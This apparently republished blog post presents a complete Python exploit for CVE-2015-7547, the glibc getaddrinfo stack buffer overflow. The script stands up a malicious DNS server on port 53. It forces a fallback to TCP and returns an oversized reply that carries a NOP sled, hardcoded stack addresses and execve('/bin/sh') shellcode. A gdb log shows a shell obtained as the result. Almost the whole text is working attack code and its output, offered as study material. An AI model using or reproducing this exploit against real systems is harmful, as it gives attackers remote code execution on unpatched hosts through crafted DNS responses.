glibc - getaddrinfo Stack Based Buffer Overflow

glibc - getaddrinfo Stack Based Buffer Overflow

add by SpeeDr00t@Blackfalcon (jang kyoung chip)

 

This is a published vulnerability by google in the past.

Please refer to the link below.

   

Reference:

- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html

- https://github.com/fjserna/CVE-2015-7547

- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow

 

When Google announced about this code(vulnerability),

it was missing information on shellcode.

So, I tried to completed the shellcode.

In the future, I hope to help your study.

   

exploit :

https://www.exploit-db.com/exploits/40339/

	/*
	add by SpeeDr00t@Blackfalcon (jang kyoung chip)
	This is a published vulnerability by google in the past.
	Please refer to the link below.
	Reference:
	- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
	- https://github.com/fjserna/CVE-2015-7547
	- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow
	When Google announced about this code(vulnerability),
	it was missing information on shellcode.
	So, I tried to completed the shellcode.
	In the future, I hope to help your study.
	(gdb) r
	Starting program: /home/haker/client1
	Got object file from memory but can't read symbols: File truncated.
	[UDP] Total Data len recv 36
	[UDP] Total Data len recv 36
	udp send
	sendto 1
	TCP Connected with 127.0.0.1:60259
	[TCP] Total Data len recv 76
	[TCP] Request1 len recv 36
	data1 = �� foobargooglecom
	query = foobargooglecom $(� foobargooglecom
	[TCP] Request2 len recv 36
	sendto 2
	data1_reply
	data2_reply
	[UDP] Total Data len recv 36
	[UDP] Total Data len recv 36
	udp send
	sendto 1
	TCP Connected with 127.0.0.1:60260
	[TCP] Total Data len recv 76
	[TCP] Request1 len recv 36
	data1 = �� foobargooglecom
	query = foobargooglecom $�7 foobargooglecom
	[TCP] Request2 len recv 36
	sendto 2
	data1_reply
	data2_reply
	process 6415 is executing new program: /bin/dash
	$ id
	uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
	$
	*/
	import socket
	import time
	import struct
	import threading
	IP = '192.168.111.5' # Insert your ip for bind() here...
	ANSWERS1 = 184
	terminate = False
	last_reply = None
	reply_now = threading.Event()
	def dw(x):
	return struct.pack('>H', x)
	def dd(x):
	return struct.pack('>I', x)
	def dl(x):
	return struct.pack('<Q', x)
	def db(x):
	return chr(x)
	def udp_thread():
	global terminate
	# Handle UDP requests
	sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	sock_udp.bind((IP, 53))
	reply_counter = 0
	counter = -1
	answers = []
	while not terminate:
	data, addr = sock_udp.recvfrom(1024)
	print '[UDP] Total Data len recv ' + str(len(data))
	id_udp = struct.unpack('>H', data[0:2])[0]
	query_udp = data[12:]
	# Send truncated flag... so it retries over TCP
	data = dw(id_udp) # id
	data += dw(0x8380) # flags with truncated set
	data += dw(1) # questions
	data += dw(0) # answers
	data += dw(0) # authoritative
	data += dw(0) # additional
	data += query_udp # question
	data += '\x00' * 2500 # Need a long DNS response to force malloc
	answers.append((data, addr))
	if len(answers) != 2:
	continue
	counter += 1
	if counter % 4 == 2:
	answers = answers[::-1]
	print 'udp send '
	time.sleep(0.01)
	sock_udp.sendto(*answers.pop(0))
	print 'sendto 1 '
	reply_now.wait()
	sock_udp.sendto(*answers.pop(0))
	print 'sendto 2 '
	sock_udp.close()
	def tcp_thread():
	global terminate
	counter = -1
	#Open TCP socket
	sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	sock_tcp.bind((IP, 53))
	sock_tcp.listen(10)
	print 'a'
	while not terminate:
	conn, addr = sock_tcp.accept()
	counter += 1
	print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])
	# Read entire packet
	data = conn.recv(1024)
	print '[TCP] Total Data len recv ' + str(len(data))
	reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])
	print '[TCP] Request1 len recv ' + str(reqlen1)
	data1 = data[2:2+reqlen1]
	print 'data1 = ' +data1
	id1 = struct.unpack('>H', data1[0:2])[0]
	query1 = data[12:]
	print 'query = ' + query1
	# Do we have an extra request?
	data2 = None
	if len(data) > 2+reqlen1:
	reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])
	print '[TCP] Request2 len recv ' + str(reqlen2)
	data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]
	id2 = struct.unpack('>H', data2[0:2])[0]
	query2 = data2[12:]
	# Reply them on different packets
	data = ''
	data += dw(id1) # id
	data += dw(0x8180) # flags
	data += dw(1) # questions
	data += dw(ANSWERS1) # answers
	data += dw(0) # authoritative
	data += dw(0) # additional
	data += query1 # question
	for i in range(ANSWERS1):
	answer = dw(0xc00c) # name compressed
	answer += dw(1) # type A
	answer += dw(1) # class
	answer += dd(13) # ttl
	answer += dw(4) # data length
	answer += 'D' * 4 # data
	data += answer
	data1_reply = dw(len(data)) + data
	if data2:
	data = ''
	data += dw(id2)
	data += 'A' * (6)
	data += '\x08\xc5\xff\xff\xff\x7f\x00\x00'
	data += '\x90' * (44)
	data += '\x90' * (1955)
	data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
	data += '\x90' * (100)
	data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
	data += 'F' * (8)
	data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
	data += 'G' * (134)
	data2_reply = dw(len(data)) + data
	else:
	data2_reply = None
	reply_now.set()
	time.sleep(0.01)
	conn.sendall(data1_reply)
	print 'data1_reply'
	time.sleep(0.01)
	if data2:
	conn.sendall(data2_reply)
	print 'data2_reply'
	reply_now.clear()
	sock_tcp.shutdown(socket.SHUT_RDWR)
	sock_tcp.close()
	if __name__ == "__main__":
	t = threading.Thread(target=udp_thread)
	t.daemon = True
	t.start()
	tcp_thread()
	terminate = True

view raw CVE-2015-7547.py hosted with ❤ by GitHub